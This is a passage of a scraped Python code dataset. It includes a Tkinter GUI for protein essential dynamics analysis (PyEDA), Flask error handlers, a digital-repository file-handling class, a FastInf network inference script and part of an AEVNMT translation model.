columnspan=2)\n        ### choose mode\n        label2 = tkinter.Label(self, text=\"Mode:\",\n                               font=(\"Helvetica\", 15))\n        label2.grid(row=3, column=2, columnspan=3)\n        self.m = tkinter.StringVar()\n        m1 = tkinter.Radiobutton( self, text=\"NMR\", variable = self.m, \\\n            value = 'NMR', command = self.select_m)\n        m2 = tkinter.Radiobutton( self, text=\"MD\", variable = self.m, \\\n            value = 'MD', command = self.select_m )\n\n        m1.grid( row=4, column=2)\n        m2.grid( row=4, column=3, columnspan=2)\n\n        self.label_m = tkinter.Label(self)\n        self.label_m.grid(row=5, column=2, columnspan=3)\n\n        ### choose atoms\n        label3 = tkinter.Label(self, text=\"Atoms:\",\n                               font=(\"Helvetica\", 15))\n        label3.grid(row=6, column=2, columnspan=3)\n        self.var = tkinter.StringVar()\n        r1 = tkinter.Radiobutton( self, text=\"Only CA\", variable = self.var,\\\n            value = 'CA', command = self.select_a)\n        r2 = tkinter.Radiobutton( self, text=\"Backbone\", \\\n            variable = self.var, value = 'Back', command = self.select_a )\n        r3 = tkinter.Radiobutton( self, text=\"All\", variable = self.var, \\\n            value = 'all', command = self.select_a )\n\n        r1.grid( row=7, column=2)\n        r2.grid( row=7, column=3)\n        r3.grid( row=7, column=4)\n\n        self.label_a = tkinter.Label(self)\n        self.label_a.grid(row=8, column=2, columnspan=3)\n\n        ### start page button\n        button = tkinter.Button(self, text=\"Start page\",\n                                command=lambda: controller.show_frame(\"StartPage\"))\n        button.grid( row=8, column=0)\n        ### close button\n        close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n        close_button.grid( row=8, column=1)\n        ### weighting loop for the grid columns\n        i=0\n        while (i<4):\n            self.grid_columnconfigure(i, weight=1)\n            i+=1\n    def select_m(self):\n        \"\"\"displays a message with the option chosen\"\"\"\n        selection = \"You selected the option %s\" %self.m.get()\n        self.label_m.config(text=selection)\n        
self.controller.app_data[\"mode\"] = self.m.get()\n    def select_a(self):\n        \"\"\"displays a message with the option chosen\"\"\"\n        selection = \"You selected the option %s\" %self.var.get()\n        self.label_a.config(text=selection)\n        self.controller.app_data[\"atom\"] = self.var.get()\n\n    def check_uniprot_accession_code(self):\n        \"\"\" uses a helper function to check whether the code is 4 chars long\"\"\"\n        if mdl.pdb_code_check(self.entry_var.get()):\n            self.entry[\"foreground\"] = \"green\"\n        else:\n            sys.stderr.write(\"%s is not a valid PDB code\\n\" \\\n                %self.entry_var.get())\n            self.entry[\"foreground\"] = \"red\"\n    def get_pdb(self):\n        \"\"\"gets the pdb code and stores the info, then moves on to waiting\"\"\"\n        interface_code = str(self.entry_var.get())\n        if mdl.pdb_code_check(interface_code):\n            self.controller.app_data[\"pdbid\"] = interface_code\n            self.controller.app_data[\"pdbfilename\"] = 'pdb'+interface_code+'.ent'\n            self.controller.app_data[\"pathname\"] = 'pdbfiles/'\n            self.controller.app_data[\"pathplots\"] = 'plots/'\n            if not os.path.exists(self.controller.app_data[\"pathname\"]):\n                os.mkdir(self.controller.app_data[\"pathname\"])\n            if not os.path.exists(self.controller.app_data[\"pathplots\"]):\n                os.mkdir(self.controller.app_data[\"pathplots\"])\n            self.controller.show_frame(\"waiting_window\")\n\n        else:\n            sys.stderr.write(\"%s is not a valid PDB code\\n\" \\\n                %self.entry_var.get())\n            self.entry[\"foreground\"] = \"red\"\n\n    def select_file(self):\n        \"\"\"gets the pdb file name and stores the info, then moves on to waiting\"\"\"\n        filename = filedialog.askopenfilename()\n        if not (filename.endswith('pdb') or filename.endswith('ent')):\n            raise ValueError('Your input file is not a valid PDB file, \\\nplease use a pdb or ent file')\n        path_name,pdb_file = os.path.split(filename)\n        sys.stderr.write(\"Reading the structure from {}.\\n\".format(filename))\n        self.controller.app_data[\"pathname\"] = path_name+'/'\n        self.controller.app_data[\"pathplots\"] = path_name+'/plots/'\n        self.controller.app_data[\"pdbfilename\"] = pdb_file\n        if pdb_file.endswith('pdb'):\n            pdb_id = pdb_file[:4]\n        elif pdb_file.endswith('ent'):\n            pdb_id = pdb_file[3:7]\n        else:\n            raise ValueError('Your input file is not a valid PDB file, \\\nplease use a pdb or ent file')\n        self.controller.app_data[\"pdbid\"] = pdb_id\n        self.controller.app_data[\"atom\"] = self.var\n        self.controller.show_frame(\"waiting_window\")\n\n\n################################################################################\n\nclass About_EDA(tkinter.Frame):\n    \"\"\"\n    It is an information page that contains an explanation of the software\n    features.\n\n    Methods:\n\n    Attributes:\n\n    \"\"\"\n    def __init__(self, parent, controller):\n        \"\"\" Constructor \"\"\"\n        tkinter.Frame.__init__(self, parent)\n        self.controller = controller\n        label1 = tkinter.Label(self, text=\"Help and Documentation\", font=TITLE_FONT)\n        label2 = tkinter.Label(self, text=\"\"\"\n    PyEDA is a python based software that performs a Normal Mode Analysis\n    using an Essential Dynamics approach.\n    \"\"\", font=text_fornt, justify=tkinter.LEFT)\n        label3 = tkinter.Label(self, text=\"\"\"\n    You can perform the analysis from a pdb file or you can introduce the\n    desired pdb code and the program will retrieve the pdb file for you if\n    you have an internet connection.\n    \"\"\", font=text_fornt, justify=tkinter.LEFT)\n        label4 = tkinter.Label(self, text=\"\"\"\n    The Program will output a set of files and plots. 
First, it will\n    generate a superimposed pdb file with all the NMR models or MD frames.\n    After that it will calculate the covariance matrix of the coordinates\n    and will output a plot of the eigenvalues derived from the\n    diagonalization of the matrix. Finally, it will output a pdb file\n    with the moved coordinates.\n    \"\"\", font=text_fornt, justify=tkinter.LEFT)\n        label1.grid(row=0,column=0,columnspan=3)\n        label2.grid(row=1,column=0,columnspan=3)\n        label3.grid(row=2,column=0,columnspan=3)\n        label4.grid(row=3,column=0,columnspan=3)\n\n        button = tkinter.Button(self, text=\"Go to the start page\",\n                                command=lambda: controller.show_frame(\"StartPage\"))\n        button.grid(row=4,column=0)\n\n        button1 = tkinter.Button(self, text=\"Start the Analysis\",\n                                 command=lambda: controller.show_frame(\"initial_root\"))\n        button1.grid(row=4,column=1)\n\n        close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n        close_button.grid(row=4,column=2)\n        ### weighting loop for the grid rows\n        i=0\n        while (i<4):\n            self.grid_rowconfigure(i, weight=1)\n            i+=1\n################################################################################\n\nclass waiting_window(tkinter.Frame):\n    \"\"\"\n    It is the window where the proper analysis is taking place. The user hits\n    the button and the analysis follows.\n\n    Methods:\n        analysis -> It is the method where all the computations are located. It\n            starts when the user hits the button Analysis.\n\n    Attributes:\n\n    \"\"\"\n    def __init__(self, parent, controller):\n        \"\"\"Constructor\"\"\"\n        tkinter.Frame.__init__(self, parent)\n        self.controller = controller\n        ### title\n        title = tkinter.Label(self, text=\"Waiting Room.\",\n                              font=TITLE_FONT)\n        title.pack(side=tkinter.TOP)\n        subtitle = tkinter.Label(self, text=\"\"\"\n    Please, hit the button Analysis to start the computations.\n    Have a coffee while your data is being processed.\n    \"\"\", font=text_fornt)\n        subtitle.pack(side=tkinter.TOP)\n        ### analysis\n        analysis_button = tkinter.Button(self, text=\"Analysis\",\\\n            command=self.analysis)\n        analysis_button.pack()\n\n\n        ### add a closing button\n        close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n        close_button.pack()\n\n    def analysis(self):\n        \"\"\"\n        Basically it contains all the computations needed to perform the EDA.\n        It contains the same steps used in the main CLI.\n        It also generates the plots at the end. 
Once the plots are generated,\n it moves the software to the plot_window.\n \"\"\"\n pdb_id = self.controller.app_data[\"pdbid\"]\n pathname = self.controller.app_data[\"pathname\"]\n pdbfile = self.controller.app_data[\"pdbfilename\"]\n atom = self.controller.app_data[\"atom\"]\n mode = self.controller.app_data[\"mode\"]\n\n sys.stderr.write(\"the selected mode is: {} \".format(mode))\n pdbalignedfile = str(pdb_id) + 'align.pdb'\n pdb_superimp = str(pathname) + str(pdb_id) + 'superimp.pdb'\n\n if not os.path.exists(str(pathname)+str(pdbfile)):\n pdbobj = pdb.PDBList()\n pdbobj.retrieve_pdb_file(pdb_id, pdir=str(pathname))\n sys.stderr.write(\"The structure {} has been \\\nretrieved.\\n\".format(pdb_id))\n\n atom_list = []\n if atom == 'CA':\n atom_list = ['CA']\n elif atom == 'Back':\n atom_list = ['N', 'CA', 'C', 'O']\n else:\n atom_list = ['N', 'CA', 'C', 'O']\n\n if mode == 'MD':\n pdbref = pdb.PDBList()\n ref_file = pdbref.retrieve_pdb_file(pdb_id, pdir=pathname)\n parser = pdb.PDBParser(QUIET=True)\n reference = parser.get_structure(pdb_id+'ref', ref_file)\n try:\n ED = eda.EDAnalysis(pdb_id, mode, atom_list, pathname+pdbfile,\n reference=reference)\n except (eda.WrongModeException, KeyError, ValueError):\n # the analysis cannot continue without a valid EDAnalysis object\n raise\n else:\n ED = eda.EDAnalysis(pdb_id, mode, atom_list, pathname+pdbfile)\n\n\n ED.superimpose_models()\n if mode == 'NMR':\n sys.stderr.write(\"Writing the superimposed file.\\n\")\n head = mdl.store_header_text(pathname+pdbfile)\n self.controller.app_data[\"head\"] = head\n io = pdb.PDBIO()\n io.set_structure(ED.structure)\n io.save(pdb_superimp)\n mdl.merge_the_header(pdb_superimp, head, pathname+pdbalignedfile)\n os.remove(pdb_superimp)\n\n\n sys.stderr.write(\"Calculating means and coordinates\\n\")\n ED.createcordsarray()\n sys.stderr.write(\"Calculating covariance matrix\\n\")\n sys.stderr.write(\"Calculating eigenvalues and eigenvectors\\n\")\n ED.cal_cov()\n sys.stderr.write(\"Plotting eigenvalues\\n\")\n self.controller.app_data[\"ED\"] = ED\n #pathplots = self.controller.app_data[\"pathplots\"]\n n_plot = 30\n if ED.n < n_plot:\n n_plot = ED.n\n pathplots = pathname + 'plots/'\n plot = ED.plot_eig_wosv(n_plot)\n self.controller.app_data[\"plot\"] = plot\n\n\n RMSD_plot = ED.RMSD_res_plot(4, pathplots, origin='interface')\n self.controller.app_data[\"RMSD_plot\"] = RMSD_plot\n self.controller.show_frame(\"plot_window\")\n\n\n################################################################################\n\nclass plot_window(tkinter.Frame):\n \"\"\"\n This window integrates the matplotlib package in a Tkinter interface. It uses\n the previously generated plots in the analysis method. The user can hit one\n or the other button to see the eigen_plot or the RMSD_plot.\n\n Methods:\n eigen_plot -> It displays the plot eigenvalue vs eigenindex. It uses the\n matplotlib integration in tkinter.\n RMSD_plot -> It shows the RMSD vs Residue plot. 
It uses the matplotlib\n integration in tkinter.\n\n Attributes:\n\n \"\"\"\n def __init__(self, parent, controller):\n tkinter.Frame.__init__(self, parent)\n self.controller = controller\n self.canvas = None\n grid_frame = tkinter.Frame(self)\n grid_frame.pack(side=tkinter.LEFT)\n label = tkinter.Label(grid_frame, text=\"Choose a plot to visualize:\",\n font=(\"Helvetica\", 15))\n label.grid(row=0, column=0)\n eigen_button = tkinter.Button(grid_frame, text=\"Eigen Vectors Plot\", command=self.eigen_plot)\n eigen_button.grid(row=0, column=1)\n\n RMSD_button = tkinter.Button(grid_frame, text=\"RMSD Plot\", command=self.RMSD_plot)\n RMSD_button.grid(row=0, column=2)\n ### generate a trajectory file\n ### trajectory\n ### eigv entry\n self.entry_evc = tkinter.IntVar()\n ### entry\n label2 = tkinter.Label(grid_frame, text=\"Choose a Eigen Vector for the trajectory:\",\n font=(\"Helvetica\", 15))\n label2.grid(row=1, column=0)\n self.entry = tkinter.Entry(grid_frame, bd=2, width=5, \\\n textvariable=self.entry_evc)\n self.entry.grid(row=1, column=1)\n\n label2 = tkinter.Label(grid_frame, text=\"ev index (1-10)\",\n font=(\"Helvetica\", 15))\n label2.grid(row=1, column=2)\n\n self.entry_time = tkinter.IntVar()\n ### entry\n label_time = tkinter.Label(grid_frame, text=\"Enter maximum span for the trajectory:\",\n font=(\"Helvetica\", 15))\n label_time.grid(row=2, column=0)\n self.entry_time = tkinter.Entry(grid_frame, bd=2, width=5, \\\n textvariable=self.entry_time)\n self.entry_time.grid(row=2, column=1)\n\n label3 = tkinter.Label(grid_frame, text=\"span (1-3)\",\n font=text_fornt)\n label3.grid(row=2, column=2)\n\n traj_but=tkinter.Button(grid_frame, text=\"Get the trajectory\", \\\n command=self.trajectory)\n traj_but.grid(row=3, column=0, columnspan=3)\n\n ### close button\n close_button = tkinter.Button(self, text=\"Close\", command=self.quit)\n close_button.pack(side=tkinter.BOTTOM)\n\n\n def eigen_plot(self):\n \"\"\"It generates a canvas to inttegrate the already generated plot\"\"\"\n if self.canvas != None:\n self.canvas.get_tk_widget().destroy()\n self.toolbar.destroy()\n plot = self.controller.app_data[\"plot\"]\n self.canvas = FigureCanvasTkAgg(plot, master=self)\n self.canvas.show()\n self.canvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n #\n self.toolbar = NavigationToolbar2TkAgg(self.canvas, self)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n def RMSD_plot(self):\n \"\"\"It generates a canvas to inttegrate the already generated plot\"\"\"\n if self.canvas != None:\n self.canvas.get_tk_widget().destroy()\n self.toolbar.destroy()\n plot = self.controller.app_data[\"RMSD_plot\"]\n self.canvas = FigureCanvasTkAgg(plot, master=self)\n self.canvas.show()\n self.canvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n #\n self.toolbar = NavigationToolbar2TkAgg(self.canvas, self)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n def trajectory(self):\n ED = self.controller.app_data[\"ED\"]\n pathname = self.controller.app_data[\"pathname\"]\n head = self.controller.app_data[\"head\"]\n evc = int(self.entry_evc.get())\n time = int(self.entry_time.get())\n ### generating the new trajectory\n sys.stderr.write(\"Generating eigenvector trajectories\\n\")\n moved = ED.move_structure(time, evc, pathname)\n new_moved = moved[:-5]+'.pdb'\n mdl.merge_the_header(moved, head, new_moved)\n os.remove(moved)\n 
sys.stderr.write(\"Done!\\n\")\n\n################################################################################\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n app = EDA_app()\n app.mainloop()\n","sub_path":"PyEDA/build/lib/PyEDA/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":25756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"630114106","text":"from flask import jsonify\nfrom app import app\n\n@app.errorhandler(400)\ndef handle_empty_data(error):\n response = jsonify({\n 'message': 'You either submitted empty data or incorrect data.',\n 'type': 'error'})\n response.status_code=400\n return response\n\n@app.errorhandler(401)\ndef handle_empty_data(error):\n response.headers['WWW-Authenticate'] = 'Basic realm=\"Notes\"'\n response = jsonify({\n 'message': 'Access Denied. Please re-enter your credentials.',\n 'type': 'error'})\n response.status_code=401\n return response\n\n@app.errorhandler(404)\ndef handle_not_found(error):\n response = jsonify({\n 'message': 'Not found.',\n 'type': 'error'})\n response.status_code=404\n return response\n\nclass ValidationError(Exception):\n def __init__(self, field, message):\n self.field = field\n self.message = message\n\n@app.errorhandler(ValidationError)\ndef handle_validation_error(error):\n response = jsonify({\n 'message': error.message,\n 'type': 'validation',\n 'field': error.field })\n response.status_code=400\n return response\n","sub_path":"app/v0/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"597345180","text":"from collections import namedtuple\nfrom hashlib import md5, sha256\nfrom magic import from_file\nfrom os import access, chown, listdir, mkdir, rmdir, stat, R_OK, walk\nfrom os.path import dirname, exists, join, relpath, splitext, basename\nfrom mimetypes import guess_type, read_mime_types\nfrom re import compile as re_compile\nfrom shutil import move\n\nclass Item(object):\n \"\"\"\n This class holds the data for each regular file in a new batch\n \"\"\"\n \n root_path = \"\"\n filepath = \"\"\n sha256 = \"\"\n md5 = \"\"\n accession = \"\"\n mimetype = \"\"\n can_read = False\n has_technical_md = False\n \n def __init__(self, path, root):\n self.root_path = root\n self.filepath = join(root, path)\n self.set_readability(self.test_readability())\n\n def test_readability(self):\n if access(self.filepath, R_OK):\n return True\n else:\n return False\n\n def set_readability(self, readable_notice):\n self.can_read = readable_notice\n\n def read_file(self):\n with open(self.filepath,'r') as f:\n fileData=f.read()\n return fileData\n\n def read_file_binary(self):\n with open(self.filepath,'rb') as f:\n fileData=f.read()\n return fileData\n\n def find_md5_hash(self):\n return self.find_hash_of_file(md5)\n\n def find_sha256_hash(self):\n return self.find_hash_of_file(sha256)\n\n def find_hash_of_file(self, hash_type, blocksize=65536):\n def check():\n if hash_type.__name__ == sha256.__name__ or \\\n hash_type.__name__ == md5.__name__:\n return True\n else:\n return False\n assert check()\n hash = hash_type()\n afile = open(self.filepath,'rb')\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hash.update(buf)\n buf = afile.read(blocksize)\n return hash.hexdigest()\n\n def set_md5(self, hash_value):\n self.md5 = hash_value\n\n def set_sha256(self, hash_value):\n self.sha256 = hash_value\n\n def get_md5(self):\n return 
self.md5\n\n def get_sha256(self):\n return self.sha256\n\n def get_file_path(self):\n return self.filepath\n\n def set_file_path(self,new_file_path):\n # the attribute used everywhere else is 'filepath'\n self.filepath = new_file_path\n\n def find_file_accession(self):\n relative_path = relpath(self.filepath, self.root_path)\n accession, *tail = relative_path.split('/')\n return accession\n \n def set_accession(self, identifier):\n if re_compile(r'\\w{13}').match(identifier):\n self.accession = identifier\n else:\n raise ValueError(\"You did not pass a valid noid\")\n\n def find_file_name(self):\n return basename(self.filepath)\n\n def find_file_name_no_extension(self):\n return splitext(basename(self.filepath))[0]\n \n def get_accession(self):\n return self.accession\n\n def find_file_extension(self):\n filename = basename(self.filepath)\n return splitext(filename)[1] \n\n def set_file_extension(self, value):\n self.file_extension = value\n \n def get_file_extension(self):\n return self.file_extension\n\n def find_file_size(self):\n return stat(self.filepath).st_size\n\n def set_file_size(self, size_info):\n if isinstance(size_info, int):\n self.file_size = size_info\n else:\n raise ValueError(\"You did not pass an integer.\")\n\n def get_file_size(self):\n return self.file_size\n\n def find_file_mime_type_from_extension(self):\n try:\n return guess_type(self.filepath)[0]\n except Exception as e:\n return (False,e)\n\n def find_file_mime_type_from_magic_numbers(self):\n try:\n return from_file(self.filepath, mime=True)\n except Exception as e:\n return (False,e)\n\n def find_file_mime_type(self):\n # try the extension first, then fall back to magic numbers\n try:\n mimetype = self.find_file_mime_type_from_extension()\n except Exception:\n try:\n mimetype = self.find_file_mime_type_from_magic_numbers()\n except Exception:\n mimetype = None\n return mimetype\n\n def set_file_mime_type(self, mimetype_value):\n self.mimetype = mimetype_value\n\n def get_file_mime_type(self):\n return self.mimetype\n\n def find_technical_metadata(self):\n fits_filepath = join(self.filepath,'.fits.xml')\n if exists(fits_filepath):\n self.has_technical_md = True\n else:\n pass\n return True\n\n def find_a_group(self):\n print(\"testing...\")\n return True \n\n def get_destination_path(self, new_root_directory):\n path_sans_root = relpath(self.filepath, self.root_path)\n destination_full_path = join(new_root_directory, path_sans_root)\n self.destination = destination_full_path\n return True\n\n def set_destination_path(self, new_path):\n self.destination = new_path\n\n def move_into_new_location(self):\n try:\n move(self.filepath, self.destination)\n return (True,None)\n except Exception as e:\n return (False,e)\n\n def copy_source_directory_tree_to_destination(self):\n destination_directories = dirname(self.destination).split('/')\n directory_tree = \"\"\n for f in destination_directories:\n directory_tree = join(directory_tree,f)\n if not exists(directory_tree):\n try:\n mkdir(directory_tree,0o740)\n except Exception as e:\n return (False,e)\n return (True,None)\n \n def clean_out_source_directory_tree(self):\n directory_tree = dirname(self.filepath)\n for src_dir, dirs, files in walk(directory_tree):\n try:\n rmdir(src_dir)\n return (True,None)\n except Exception as e:\n return (False,e)\n \n def find_object_identifier(self, control_type_data):\n object_pattern = control_type_data.get('object')\n assert object_pattern\n pattern_search = re_compile(object_pattern).search(self.filepath)\n if pattern_search:\n return namedtuple(\"data\", \"valid keys\")( \\\n True,\n pattern_search.groups() \\\n )\n 
else:\n return namedtuple(\"data\", \"valid keys\")( \\\n False,\n None \\\n )\n\n def classify_file_type(self, control_type_data):\n page_pattern = control_type_data.get('page_file')\n object_pattern = control_type_data.get('object_file')\n page_pattern_search = re_compile(page_pattern).search(self.filepath)\n object_pattern_search = re_compile(object_pattern). \\\n search(self.filepath)\n pagenumber = None\n if page_pattern_search:\n groups = page_pattern_search.groups()\n pagenumber = groups[-2]\n pagenumber = pagenumber.lstrip('0')\n tag = \"page_file\"\n elif object_pattern_search:\n # check the match result, not the pattern string\n tag = \"object_file\"\n else:\n tag = \"undefinable\"\n self.tag = tag\n if pagenumber:\n self.pagenumber = pagenumber\n\n def set_destination_ownership(self, user_name, group_name):\n uid = getpwnam(user_name).pw_uid\n gid = getgrnam(group_name).gr_gid\n try:\n chown(self.destination, uid, gid)\n return (True,None)\n except Exception as e:\n return (False,e)\n","sub_path":"uchicagoldr/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":7770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"74460966","text":"import numpy as np\nimport glob\nimport os\nimport torch\nfrom hparams import hparams\nimport pickle\n\nroot_dir = \"/hd0/speechsplit/preprocessed/spmel\"\nfeat_dir = \"/hd0/speechsplit/preprocessed/raptf0\"\nfile_name = \"004/004_179.npy\"\n\nmetadata = pickle.load(open('/hd0/speechsplit/preprocessed/spmel/train.pkl', \"rb\"))\n\nsbmt_i = metadata[0]\n# choose the device used for the embedding tensor\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nemb_org = torch.from_numpy(sbmt_i[1]).to(device)\n\nmelsp = np.load(os.path.join(root_dir, file_name))\nf0_org = np.load(os.path.join(feat_dir, file_name))\n\nprint(melsp[0:, :].shape)\n\nlen_crop = np.random.randint(hparams.min_len_seq, hparams.max_len_seq+1, size=2)\nprint(len(melsp) - len_crop)\nleft = np.random.randint(0, len(melsp)-len_crop, size=2)\nprint(left)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"232135368","text":"#####\n#Based on FastInf Algorithm by Altan Alpay, Deniz Demir, Jie Yang for their CS 224W Project (2011)\n\nimport snap\nimport pickle as pkl\nimport numpy as np\nimport sys\nfrom collections import defaultdict\nimport os\nimport math\nimport operator\n\nk=300\nd=1000000\nalpha=1\n\ndef readfile(filename):\n\tcascades_list = []\n\twith open(filename) as fp:\n\t\tfor line in fp:\n\t\t\tcascades_list.append(line)\n\n\tcascades_arr = []\n\n\tfor casc in cascades_list:\n\t\tlinesplit = [x for x in casc.split(',')]\n\t\tnodes = []\n\t\tfor node in range(0,len(linesplit),2):\n\t\t\tnodes.append((int(linesplit[node]),float(linesplit[node+1])))\n\t\tcascades_arr.append(nodes)\n\n\t# print cascades_arr\n\treturn cascades_arr\n\ndef fastInf(C):\n\tE_exp = {}\n\tE_pl = {}\n\tE_simple = {}\n\tfor cascade in C:\n\t\tfor i in range(0,len(cascade)):\n\t\t\tfor j in range(i+1, min(i+1+d, len(cascade))):\n\t\t\t\tni = cascade[i][0]\n\t\t\t\tnj = cascade[j][0]\n\t\t\t\tif (ni,nj) not in E_exp:\n\t\t\t\t\tE_exp[(ni,nj)] = 0\n\t\t\t\t\tE_simple[(ni,nj)]=0\n\t\t\t\t\tE_pl[(ni,nj)]=0\n\t\t\t\tE_exp[(ni,nj)] += calc_weight_exponential(cascade,i,j)\n\t\t\t\tE_pl[(ni,nj)] += calc_weight_powerlaw(cascade,i,j)\n\t\t\t\tE_simple[(ni,nj)] += calc_weight(i,j)\n\n\treturn E_exp,E_pl,E_simple\n\ndef calc_weight(i,j):\n\treturn 1.0/(j-i)\n\ndef calc_weight_exponential(cascade,i,j):\n\tif cascade[j][1]-cascade[i][1] != 0:\n\t\tnum = 
np.exp(alpha*(cascade[j][1]-cascade[i][1])/100)\n\telse:\n\t\treturn 0.0\n\tdenom = 0.0\n\tfor n in range(0,j):\n\t\tif cascade[j][1]-cascade[n][1] != 0:\n\t\t\tdenom += np.exp(alpha*(cascade[j][1]-cascade[n][1])/100)\n\n\treturn (num*1.0)/(denom*1.0)\n\ndef calc_weight_powerlaw(cascade,i,j):\n\tif cascade[j][1]-cascade[i][1] != 0:\n\t\tnum = (cascade[j][1]-cascade[i][1])**(-1.0*alpha)\n\telse: \n\t\treturn 0.0\n\tdenom = 0.0\n\tfor n in range(0,j):\n\t\tif cascade[j][1]-cascade[n][1] != 0:\n\t\t\tdenom += (cascade[j][1]-cascade[n][1])**(alpha*-1.0)\n\treturn (num*1.0)/(denom*1.0)\n\ndef output_network(E_exp,E_pl,E_simple):\n\tE_exp_s = sorted(E_exp.items(), key=operator.itemgetter(1), reverse=True)\n\tE_simple_s = sorted(E_simple.items(), key=operator.itemgetter(1), reverse=True)\n\tE_pl_s = sorted(E_pl.items(), key=operator.itemgetter(1), reverse=True)\n\t# match each file handle to its own output file\n\tf_exp = open('../../data/fastinf/exp_fastinf_edges.txt','w+')\n\tf_simp = open('../../data/fastinf/simple_fastinf_edges.txt','w+')\n\tf_pl = open('../../data/fastinf/powerlaw_fastinf_edges.txt', 'w+')\n\tf2_exp = open('../../data/fastinf/exp_fastinf_loadedgelist.txt', 'w+')\n\tf2_pl = open('../../data/fastinf/pl_fastinf_loadedgelist.txt', 'w+')\n\tf2_simp = open('../../data/fastinf/simp_fastinf_loadedgelist.txt', 'w+')\n\n\n\n\n\tfor i in range(0,k):\n\t\tf_pl.write('%s\\n' % str(E_pl_s[i]))\n\t\tf_exp.write('%s\\n' % str(E_exp_s[i]))\n\t\tf_simp.write('%s\\n' % str(E_simple_s[i]))\n\n\t\tf2_pl.write('%s %s\\n' % (str(E_pl_s[i][0][0]), str(E_pl_s[i][0][1])))\n\t\tf2_exp.write('%s %s\\n' % (str(E_exp_s[i][0][0]), str(E_exp_s[i][0][1])))\n\t\tf2_simp.write('%s %s\\n' % (str(E_simple_s[i][0][0]), str(E_simple_s[i][0][1])))\n\n\n\tf_exp.close()\n\tf_pl.close()\n\tf_simp.close()\n\tf2_exp.close()\n\tf2_pl.close()\n\tf2_simp.close()\n\n\ndef main():\n\tC = readfile(\"../../data/full_cascade_fastinf_noun.txt\")\n\tE_exp,E_pl,E_simple = fastInf(C)\n\toutput_network(E_exp,E_pl,E_simple)\n\n\n\nmain()","sub_path":"src/gen_networks/fastinf_implementation.py","file_name":"fastinf_implementation.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255674692","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom aevnmt.components import RNNEncoder, tile_rnn_hidden, tile_rnn_hidden_for_decoder\nfrom aevnmt.dist import NormalLayer\n\nfrom itertools import chain\n\nclass InferenceNetwork(nn.Module):\n\n    def __init__(self, src_embedder, hidden_size, latent_size, bidirectional, num_enc_layers, cell_type):\n        \"\"\"\n        :param src_embedder: uses this embedder, but detaches its output from the graph as to not compute\n                             gradients for it.\n        \"\"\"\n        super().__init__()\n        self.src_embedder = src_embedder\n        emb_size = src_embedder.embedding_dim\n        self.encoder = RNNEncoder(emb_size=emb_size,\n                                  hidden_size=hidden_size,\n                                  bidirectional=bidirectional,\n                                  dropout=0.,\n                                  num_layers=num_enc_layers,\n                                  cell_type=cell_type)\n        encoding_size = hidden_size if not bidirectional else hidden_size * 2\n        self.normal_layer = NormalLayer(encoding_size, hidden_size, latent_size)\n\n    def forward(self, x, seq_mask_x, seq_len_x):\n        x_embed = self.src_embedder(x).detach()\n        encoder_outputs, _ = self.encoder(x_embed, seq_len_x)\n        avg_encoder_output = (encoder_outputs * seq_mask_x.unsqueeze(-1).type_as(encoder_outputs)).sum(dim=1)\n        return self.normal_layer(avg_encoder_output)\n\n    def parameters(self, recurse=True):\n        return chain(self.encoder.parameters(recurse=recurse), 
self.normal_layer.parameters(recurse=recurse))\n\n def named_parameters(self, prefix='', recurse=True):\n return chain(self.encoder.named_parameters(prefix='', recurse=True), self.normal_layer.named_parameters(prefix='', recurse=True), )\n\nclass AEVNMT(nn.Module):\n\n def __init__(self, tgt_vocab_size, emb_size, latent_size, encoder, decoder, language_model,\n pad_idx, dropout, tied_embeddings):\n super().__init__()\n self.latent_size = latent_size\n self.pad_idx = pad_idx\n self.encoder = encoder\n self.decoder = decoder\n self.language_model = language_model\n self.tgt_embedder = nn.Embedding(tgt_vocab_size, emb_size, padding_idx=pad_idx)\n self.tied_embeddings = tied_embeddings\n if not tied_embeddings:\n self.output_matrix = nn.Parameter(torch.randn(tgt_vocab_size, decoder.hidden_size))\n self.dropout_layer = nn.Dropout(p=dropout)\n self.encoder_init_layer = nn.Sequential(nn.Linear(latent_size, encoder.hidden_size),\n nn.Tanh())\n self.decoder_init_layer = nn.Sequential(nn.Linear(latent_size, decoder.hidden_size),\n nn.Tanh())\n self.lm_init_layer = nn.Sequential(nn.Linear(latent_size, language_model.hidden_size),\n nn.Tanh())\n self.inf_network = InferenceNetwork(src_embedder=self.language_model.embedder,\n hidden_size=encoder.hidden_size,\n latent_size=latent_size,\n bidirectional=encoder.bidirectional,\n num_enc_layers=encoder.num_layers,\n cell_type=encoder.cell_type)\n\n # This is done because the location and scale of the prior distribution are not considered\n # parameters, but are rather constant. Registering them as buffers still makes sure that\n # they will be moved to the appropriate device on which the model is run.\n self.register_buffer(\"prior_loc\", torch.zeros([latent_size]))\n self.register_buffer(\"prior_scale\", torch.ones([latent_size]))\n\n def inference_parameters(self):\n return self.inf_network.parameters()\n\n def generative_parameters(self):\n # TODO: separate the generative model into a GenerativeModel module\n # within that module, have two modules, namely, LanguageModel and TranslationModel\n return chain(self.lm_parameters(), self.tm_parameters())\n\n def lm_parameters(self):\n return chain(self.language_model.parameters(), 